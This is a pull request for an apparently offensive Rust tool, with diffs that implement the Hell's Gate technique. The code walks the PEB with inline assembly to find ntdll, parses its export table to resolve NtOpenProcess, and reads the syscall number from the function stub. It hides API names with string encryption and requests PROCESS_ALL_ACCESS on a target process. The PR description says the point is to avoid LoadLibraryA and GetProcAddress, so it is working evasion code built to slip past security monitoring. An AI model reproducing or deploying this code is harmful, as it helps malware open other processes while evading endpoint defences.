### PR TITLE
Hell's Gate full technique

### DIFF
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -5,4 +5,4 @@ edition = "2021"
 
 [dependencies]
 str_crypter = "1.0.2"
-windows = { version = "0.56.0", features = ["Win32_System_Threading", "Win32_Security", "Win32_System_LibraryLoader", "Win32_System_Diagnostics", "Win32_System_Diagnostics_Debug", "Win32_System_Kernel"] }
+windows = { version = "0.56.0", features = ["Win32_System_Threading", "Win32_Security", "Win32_System_LibraryLoader", "Win32_System_Diagnostics", "Win32_System_Diagnostics_Debug", "Win32_System_Kernel", "Win32_System_WindowsProgramming", "Win32_System_SystemServices", "Win32_System_SystemInformation" ] }

--- a/src/main.rs
+++ b/src/main.rs
@@ -1,19 +1,17 @@
 use std::arch::asm;
 use std::os::windows::ffi::OsStringExt;
-use std::{env, slice};
-use std::ffi::{c_void, CStr, OsString};
+use std::slice::from_raw_parts;
+use std::{env, panic};
+use std::ffi::{c_void, OsString};
 use std::mem::size_of;
 use std::ptr::null_mut;
 use str_crypter::{sc, decrypt_string};
 use windows::core::imp::GetProcAddress;
 use windows::core::PCSTR;
 use windows::Win32::Foundation::{HANDLE, NTSTATUS, UNICODE_STRING};
-use windows::Win32::System::Kernel::LIST_ENTRY;
 use windows::Win32::System::LibraryLoader::LoadLibraryA;
-use windows::Win32::System::SystemServices::{IMAGE_DOS_HEADER, IMAGE_DOS_SIGNATURE, IMAGE_IMPORT_DESCRIPTOR, IMAGE_NT_SIGNATURE};
-use windows::Win32::System::Threading::{PEB, PEB_LDR_DATA, PROCESS_ALL_ACCESS};
-use windows::Win32::System::Diagnostics::Debug::{SetUnhandledExceptionFilter, EXCEPTION_POINTERS, IMAGE_NT_HEADERS64};
-use windows::Win32::System::WindowsProgramming::LDR_DATA_TABLE_ENTRY;
+use windows::Win32::System::Threading::PROCESS_ALL_ACCESS;
+use windows::Win32::System::Diagnostics::Debug::{SetUnhandledExceptionFilter, EXCEPTION_POINTERS};
 
 fn main() {
 
@@ -26,8 +24,11 @@ fn main() {
     // get pid from first positional argument
     let pid = cli_pid();
 
-    // read iat
-    read_iat();
+    // get NTDLL base adddr
+    let ntdll = match get_module_base_asm("ntdll.dll") {
+        Some(a) => a,
+        None => panic!("Unable to get address"),
+    };
 
     // call NtOpenProcess via System Service Number
     let nt = match sc!("NtOpenProcess", 20) {
@@ -175,169 +176,73 @@ unsafe extern "system" fn exception_filter(pointers: *const EXCEPTION_POINTERS) 
     0
 }
 
-// Read from IAT for Hell's Gate technique 
-
-/// Return a pointer to the PEB
-unsafe fn get_peb_ptr() -> *const PEB {
-    let peb: *const PEB;
-    // access the peb directly via the GS register
-    asm!(
-        "mov {}, gs:[0x60]",
-        out(reg) peb,
-    );
-
-    peb
-}
-
-fn read_iat() {
-    // get peb via GS register
-    let peb: *const PEB = unsafe { get_peb_ptr() };
+/// Get the base address of a specified module. Obtains the base address by reading from the TEB -> PEB -> 
+/// PEB_LDR_DATA -> InMemoryOrderModuleList -> InMemoryOrderLinks -> DllBase 
+/// 
+/// Returns the DLL base address as a Option<usize> 
+#[allow(unused_assignments)]
+fn get_module_base_asm(module_name: &str) -> Option<usize>{
+    let mut peb: usize;
+    let mut ldr: usize;
+    let mut in_memory_order_module_list: usize;
+    let mut current_entry: usize;
 
     unsafe {
-        // get the loader data section
-        let loader_section = (*peb).Ldr; // points to NTDLL where the PEB_LDR_DATA exists, containing initialised data.
-        println!("Loader section address: {:p}", loader_section);
+        // get the peb and module list
+        asm!(
+            "mov {peb}, gs:[0x60]",
+            "mov {ldr}, [{peb} + 0x18]",
+            "mov {in_memory_order_module_list}, [{ldr} + 0x10]", // points to the Flink
+            peb = out(reg) peb,
+            ldr = out(reg) ldr,
+            in_memory_order_module_list = out(reg) in_memory_order_module_list,
+        );
 
-         // Verify the loader section
-         let loader_section = &*(loader_section as *const PEB_LDR_DATA);
-         println!("InMemoryOrderModuleList: {:p}", loader_section.InMemoryOrderModuleList.Flink);
+        // set the current entry to the head of the list
+        current_entry = in_memory_order_module_list;
         
-        // get the header of the module list, accessed via the Flink (aka the next link in the doubly linked list)
-        // let module_list = (*loader_section).InMemoryOrderModuleList.Flink; // points to the heap
+        // iterate the modules searching for 
+        loop {
+            let dll_base: usize;
+            let dll_name_address: usize;
+            let dll_length: u16;
+            
+            // resolve the name of the module
+            asm!(
+                "mov {dll_base}, [{current_entry} + 0x30]",
+                "mov {dll_name_address}, [{current_entry} + 0x60]",
+                "movzx {dll_length}, word ptr [{current_entry} + 0x58]", // movzx expands a byte or word to a full dword
+                dll_base = out(reg) dll_base,
+                dll_name_address = out(reg) dll_name_address,
+                dll_length = out(reg) dll_length,
+                current_entry = in(reg) current_entry,
+            );
 
-        let module_list = loader_section.InMemoryOrderModuleList.Flink;
-        println!("Module list header address: {:p}", module_list);
+            // check if the module name address is valid and not zero
+            if dll_name_address != 0 && dll_length > 0 {
+                // read the module name from memory
+                let dll_name_slice = from_raw_parts(dll_name_address as *const u16, (dll_length / 2) as usize);
+                let dll_name = OsString::from_wide(dll_name_slice);
 
-        let mut current_entry: *mut LIST_ENTRY = module_list;
-        println!("Current entry address: {:p}", current_entry);
+                println!("Module: {:?}", dll_name);
 
-        println!();
-        println!();
-
-        // iterate the linked list, this will exit once we have returned to the head of the linked list.
-        // we need to change our immutable pointer to a mutable one
-        while current_entry != &(*loader_section).InMemoryOrderModuleList as *const _ as *mut _ {
-
-            println!("Current entry: {:p}", current_entry);
-
-            // Verify current entry content
-            let ldr_entry = &*(current_entry as *mut LDR_DATA_TABLE_ENTRY);
-            println!("LDR entry DllBase: {:p}", ldr_entry.DllBase);
-            // Print FullDllName
-            let full_dll_name = &ldr_entry.FullDllName;
-            let dll_name = read_wide_string(full_dll_name.Buffer.0, full_dll_name.Length as usize);
-            println!("LDR entry FullDllName: {}", dll_name);
-
-            // Dump details to verify against x64dbg
-            println!("Flink: {:p}, Blink: {:p}", (*current_entry).Flink, (*current_entry).Blink);
-
-            let mut base_address: *mut c_void = ldr_entry.DllBase;
-
-            println!("Base address: {:p}", base_address);
-
-
-            println!("Base address after adjustment: {:p}", base_address);
-
-            // Verify the memory content at the base address before reading the DOS header
-            if base_address.is_null() || (base_address as usize) < 0x10000 {
-                println!("Invalid DllBase address: {:p}", base_address);
-                current_entry = (*current_entry).Flink;
-                continue;
-            }
-
-            let dos_header: IMAGE_DOS_HEADER = read_memory(base_address as *const IMAGE_DOS_HEADER);
-            println!("DOS header e_magic: {:#X}", dos_header.e_magic);
-
-            if dos_header.e_magic != IMAGE_DOS_SIGNATURE {
-                println!("Invalid DOS signature: {:#X}", dos_header.e_magic);
-                current_entry = (*current_entry).Flink;
-                continue;
-            }
-
-            println!("Hello 2?");
-
-            // now read NT headers
-            let nt_header: IMAGE_NT_HEADERS64 = read_memory(base_address.offset(dos_header.e_lfanew as isize) as *const IMAGE_NT_HEADERS64);
-            if nt_header.Signature != IMAGE_NT_SIGNATURE {
-                current_entry = (*current_entry).Flink;
-                continue;
-            }
-
-            // locate the import directory
-            // optional header contains information about the PE, including size and location of tables
-            // DataDirectory is an array of IMAGE_DATA_DIRECTORY structs, each entry points to different data directories
-            // DataDirectory[1] is the IAT
-            // The VirtualAddress field is the RVA (relative to the base addr of the module) of the Import Directory, which we can then convert
-            // https://learn.microsoft.com/en-us/archive/msdn-magazine/2002/march/inside-windows-an-in-depth-look-into-the-win32-portable-executable-file-format-part-2
-            let import_dir_rva = nt_header.OptionalHeader.DataDirectory[1].VirtualAddress;
-            if import_dir_rva == 0 {
-                current_entry = (*current_entry).Flink;
-                continue;
-            }
-
-            // convert RVA to VA
-            let import_dir_addr = base_address.offset(import_dir_rva as isize) as *const IMAGE_IMPORT_DESCRIPTOR;
-
-            // read and print the import descriptors
-            let mut import_descriptor = read_memory(import_dir_addr);
-            while import_descriptor.Name != 0 {
-                let name_address = base_address.offset(import_descriptor.Name as isize);
-                let dll_name = CStr::from_ptr(name_address as *const i8).to_str().unwrap_or("Unknown");
-                println!("DLL: {}", dll_name);
-
-                // read thunk data
-                let mut thunk_address = base_address.offset(import_descriptor.FirstThunk as isize) as *const usize;
-                while read_memory(thunk_address) != 0 {
-                    let thunk_data: usize = read_memory(thunk_address);
-                    let func_name_address = base_address.offset(thunk_data as isize + 2) as *const i8; // skip hint 2 bytes
-                    let func_name = CStr::from_ptr(func_name_address).to_str().unwrap_or("Unknown");
-                    println!("Function: {}", func_name);
-
-                    thunk_address = thunk_address.offset(1);
+                // do we have a match on the module name?
+                if dll_name.to_string_lossy().eq_ignore_ascii_case(module_name) {
+                    return Some(dll_base);
                 }
-
-                import_descriptor = read_memory(import_dir_addr.offset(1))
+            } else {
+                println!("Invalid module name address or length.");
             }
 
-            current_entry = (*current_entry).Flink;
-        }
-    }
-    
-}
+            // dereference current_entry which contains the value of the next LDR_DATA_TABLE_ENTRY (specifically a pointer to LIST_ENTRY 
+            // within the next LDR_DATA_TABLE_ENTRY)
+            current_entry = *(current_entry as *const usize);
 
-unsafe fn read_memory<T>(address: *const T) -> T {
-    std::ptr::read(address)
-}
-
-unsafe fn get_image_base(entry: *mut LIST_ENTRY) -> *const u8 {
-    // Cast the LIST_ENTRY to LDR_DATA_TABLE_ENTRY to access the DllBase field
-    let ldr_entry = entry as *mut LDR_DATA_TABLE_ENTRY;
-    (*ldr_entry).DllBase as *const u8
-}
-
-unsafe fn read_wide_string(buffer: *const u16, length: usize) -> String {
-    let slice = slice::from_raw_parts(buffer, length / 2); // length is in bytes, convert to number of u16
-    let os_string = OsString::from_wide(slice);
-    os_string.to_string_lossy().into_owned()
-}
-
-fn find_module_base(peb: *const PEB, module_name: &str) -> Option<*mut u8> {
-    unsafe {
-        let loader_section = (*peb).Ldr;
-        let loader_section = &*(loader_section as *const PEB_LDR_DATA);
-        let mut current_entry: *mut LIST_ENTRY = loader_section.InMemoryOrderModuleList.Flink;
-
-        while current_entry != &loader_section.InMemoryOrderModuleList as *const _ as *mut _ {
-            let ldr_entry = &*(current_entry as *mut LDR_DATA_TABLE_ENTRY);
-            let full_dll_name = &ldr_entry.FullDllName;
-            let dll_name = read_wide_string(full_dll_name.Buffer.0, full_dll_name.Length as usize);
-
-            if dll_name.to_lowercase() == module_name.to_lowercase() {
-                return Some(ldr_entry.DllBase as *mut u8);
+            // If we have looped back to the start, break
+            if current_entry == in_memory_order_module_list {
+                println!("Looped back to the start.");
+                return None;
             }
-
-            current_entry = (*current_entry).Flink;
         }
     }
-    None
 }

--- a/src/main.rs
+++ b/src/main.rs
@@ -1,4 +1,5 @@
 use std::arch::asm;
+use std::ops::Add;
 use std::os::windows::ffi::OsStringExt;
 use std::slice::from_raw_parts;
 use std::{env, panic};
@@ -6,12 +7,10 @@ use std::ffi::{c_void, OsString};
 use std::mem::size_of;
 use std::ptr::null_mut;
 use str_crypter::{sc, decrypt_string};
-use windows::core::imp::GetProcAddress;
-use windows::core::PCSTR;
 use windows::Win32::Foundation::{HANDLE, NTSTATUS, UNICODE_STRING};
-use windows::Win32::System::LibraryLoader::LoadLibraryA;
+use windows::Win32::System::SystemServices::{IMAGE_DOS_HEADER, IMAGE_DOS_SIGNATURE, IMAGE_EXPORT_DIRECTORY, IMAGE_NT_SIGNATURE};
 use windows::Win32::System::Threading::PROCESS_ALL_ACCESS;
-use windows::Win32::System::Diagnostics::Debug::{SetUnhandledExceptionFilter, EXCEPTION_POINTERS};
+use windows::Win32::System::Diagnostics::Debug::{SetUnhandledExceptionFilter, EXCEPTION_POINTERS, IMAGE_NT_HEADERS64};
 
 fn main() {
 
@@ -24,20 +23,22 @@ fn main() {
     // get pid from first positional argument
     let pid = cli_pid();
 
-    // get NTDLL base adddr
-    let ntdll = match get_module_base_asm("ntdll.dll") {
-        Some(a) => a,
-        None => panic!("Unable to get address"),
-    };
-
-    // call NtOpenProcess via System Service Number
+    // NtOpenProcess as an encrypted &str
     let nt = match sc!("NtOpenProcess", 20) {
         Ok(s) => s,
         Err(e) => panic!("Error converting  string: {e}"),
     };
-    let nt = nt.as_str();
+    let nt_open_proc_str = nt.as_str();
 
-    let ssn = get_ssn(PCSTR(nt.as_ptr()));
+    // ntdll.dll as an encrypted string
+    let ntdll = match sc!("ntdll.dll", 20) {
+        Ok(s) => s,
+        Err(e) => panic!("Error converting  string: {e}"),
+    };
+    let ntdll: &str = ntdll.as_str();
+
+    // get the SSN via the Hell's Gate technique
+    let ssn = get_ssn(ntdll, nt_open_proc_str);
     let ssn = match ssn {
         None => panic!("[-] Unable to get SSN"),
         Some(s) => {
@@ -112,23 +113,18 @@ pub struct ObjectAttributes {
 }
 
 /// Get the SSN of the NTAPI function we wish to call
-fn get_ssn(nt_function: PCSTR) -> Option<u32> {
-    let ntdll = unsafe { LoadLibraryA(PCSTR(b"ntdll.dll\0".as_ptr())) };
-    if ntdll.is_err() {
-        println!("[-] Error getting handle to ntdll.dll");
-        return None;
-    }
-
-    let nt_function_address = unsafe {GetProcAddress(ntdll.unwrap().0, nt_function.as_ptr())};
-    if nt_function_address.is_none() {
-        println!("[-] Error getting address of: {:?}", nt_function);
-        return None;
-    }
-
+fn get_ssn(dll: &str, function_name: &str) -> Option<u32> {
+    // get NTDLL base addr
+    let addr =  match get_function_from_exports(dll, function_name) {
+        Some(a) => a,
+        None => panic!("Could not get address of {}", function_name),
+    };
+    
     // read the syscall number from the function's address
-    let nt_function_address = nt_function_address.unwrap() as *const u8;
-    let byte4 = unsafe { *nt_function_address.add(4) };
-    let byte5 = unsafe { *nt_function_address.add(5) };
+    // needs casting as *const u8 to allow dereferencing from c_void (no size in a c_void).
+    // as each byte is 8 bits, we read as a u8 for 1 byte each
+    let byte4 = unsafe { *(addr as *const u8).add(4) };
+    let byte5 = unsafe { *(addr as *const u8).add(5) };
     
     // combine the fourth and fifth bytes into a u32 (DWORD)
     let nt_function_ssn = ((byte5 as u32) << 8) | (byte4 as u32);
@@ -180,8 +176,9 @@ unsafe extern "system" fn exception_filter(pointers: *const EXCEPTION_POINTERS) 
 /// PEB_LDR_DATA -> InMemoryOrderModuleList -> InMemoryOrderLinks -> DllBase 
 /// 
 /// Returns the DLL base address as a Option<usize> 
+#[allow(unused_variables)]
 #[allow(unused_assignments)]
-fn get_module_base_asm(module_name: &str) -> Option<usize>{
+fn get_module_base_asm(module_name: &str) -> Option<usize> {
     let mut peb: usize;
     let mut ldr: usize;
     let mut in_memory_order_module_list: usize;
@@ -203,31 +200,22 @@ fn get_module_base_asm(module_name: &str) -> Option<usize>{
         
         // iterate the modules searching for 
         loop {
-            let dll_base: usize;
-            let dll_name_address: usize;
-            let dll_length: u16;
+            // get the attributes we are after of the current entry
+            let dll_base = *(current_entry.add(0x30) as *const usize);
+            let module_name_address = *(current_entry.add(0x60) as *const usize);
+            let module_length = *(current_entry.add(0x58) as *const u16);
             
-            // resolve the name of the module
-            asm!(
-                "mov {dll_base}, [{current_entry} + 0x30]",
-                "mov {dll_name_address}, [{current_entry} + 0x60]",
-                "movzx {dll_length}, word ptr [{current_entry} + 0x58]", // movzx expands a byte or word to a full dword
-                dll_base = out(reg) dll_base,
-                dll_name_address = out(reg) dll_name_address,
-                dll_length = out(reg) dll_length,
-                current_entry = in(reg) current_entry,
-            );
-
             // check if the module name address is valid and not zero
-            if dll_name_address != 0 && dll_length > 0 {
+            if module_name_address != 0 && module_length > 0 {
                 // read the module name from memory
-                let dll_name_slice = from_raw_parts(dll_name_address as *const u16, (dll_length / 2) as usize);
+                let dll_name_slice = from_raw_parts(module_name_address as *const u16, (module_length / 2) as usize);
                 let dll_name = OsString::from_wide(dll_name_slice);
 
-                println!("Module: {:?}", dll_name);
+                println!("[i] Found module: {:?}", dll_name);
 
                 // do we have a match on the module name?
                 if dll_name.to_string_lossy().eq_ignore_ascii_case(module_name) {
+                    println!("[+] {:?} base address found: {:p}", dll_name, dll_base as *const c_void);
                     return Some(dll_base);
                 }
             } else {
@@ -245,4 +233,100 @@ fn get_module_base_asm(module_name: &str) -> Option<usize>{
             }
         }
     }
+}
+
+/// Get the function address of a function in a specified DLL from the DLL Base.
+/// 
+/// # Parameters 
+/// * dll_name -> the name of the DLL / module you are wanting to query
+/// * needle -> the function name (case sensitive) of the function you are looking for
+/// 
+/// # Returns
+/// Option<*const c_void> -> the function address as a pointer
+fn get_function_from_exports(dll_name: &str, needle: &str) -> Option<*const c_void> {
+
+    // get the dll base address
+    let dll_base = match get_module_base_asm(dll_name) {
+        Some(a) => a,
+        None => panic!("Unable to get address"),
+    } as *mut c_void;
+
+    // check we match the DOS header, cast as pointer to tell the compiler to treat the memory
+    // address as if it were a IMAGE_DOS_HEADER structure
+    let dos_header: IMAGE_DOS_HEADER = unsafe { read_memory(dll_base as *const IMAGE_DOS_HEADER) };
+    if dos_header.e_magic != IMAGE_DOS_SIGNATURE {
+        panic!("[-] DOS header not matched from base address: {:p}.", dll_base);
+    }
+
+    println!("[+] DOS header matched");
+
+    // check the NT headers
+    let nt_headers = unsafe { read_memory(dll_base.offset(dos_header.e_lfanew as isize) as *const IMAGE_NT_HEADERS64) };
+    if nt_headers.Signature != IMAGE_NT_SIGNATURE {
+        panic!("[-] NT headers do not match signature with from dll base: {:p}.", dll_base);
+    }
+
+    println!("[+] NT headers matched");
+
+    // get the export directory
+    // https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_data_directory
+    // found from first item in the DataDirectory; then we take the structure in memory at dll_base + RVA
+    let export_dir_rva = nt_headers.OptionalHeader.DataDirectory[0].VirtualAddress;
+    let export_offset = unsafe {dll_base.add(export_dir_rva as usize) };
+    let export_dir: IMAGE_EXPORT_DIRECTORY = unsafe { read_memory(export_offset as *const IMAGE_EXPORT_DIRECTORY) };
+    
+    // get the addresses we need
+    let address_of_functions_rva = export_dir.AddressOfFunctions as usize;
+    let address_of_names_rva = export_dir.AddressOfNames as usize;
+    let ordinals_rva = export_dir.AddressOfNameOrdinals as usize;
+
+    let functions = unsafe { dll_base.add(address_of_functions_rva as usize) } as *const u32;
+    let names = unsafe { dll_base.add(address_of_names_rva as usize) } as *const u32;
+    let ordinals = unsafe { dll_base.add(ordinals_rva as usize) } as *const u16;
+
+    // get the amount of names to iterate over
+    let number_of_names = export_dir.NumberOfNames;
+
+    for i in 0..number_of_names {
+        // calculate the RVA of the function name
+        let name_rva = unsafe { *names.offset(i.try_into().unwrap()) as usize };
+        // actual memory address of the function name
+        let name_addr = unsafe { dll_base.add(name_rva) };
+        
+        // read the function name
+        let function_name = unsafe {
+            let name_ptr = name_addr as *const u8;
+            let mut len = 0;
+            // iterate over the memory until a null terminator is found
+            while *name_ptr.add(len) != 0 {
+                len += 1;
+            }
+
+            std::slice::from_raw_parts(name_ptr, len)
+        };
+
+        let function_name = std::str::from_utf8(function_name).unwrap_or("Invalid UTF-8");
+
+        // if we have a match on our function name
+        if function_name.eq(needle) {
+            println!("[+] Function name found: {}", needle);
+
+            // calculate the RVA of the function address
+            let ordinal = unsafe { *ordinals.offset(i.try_into().unwrap()) as usize };
+            let fn_rva = unsafe { *functions.offset(ordinal as isize) as usize };
+            // actual memory address of the function address
+            let fn_addr = unsafe { dll_base.add(fn_rva) } as *const c_void;
+
+            println!("[i] Function address: {:p}", fn_addr);
+
+            return Some(fn_addr);
+        }
+    }
+
+    None
+}
+
+/// Read memory of any type
+unsafe fn read_memory<T>(address: *const T) -> T {
+    std::ptr::read(address)
 }


### PR DESCRIPTION
Full implementation of Hell's Gate by reading the export address table via the PEB, no longer requires calling `LoadLibraryA` or `GetProcAddress`.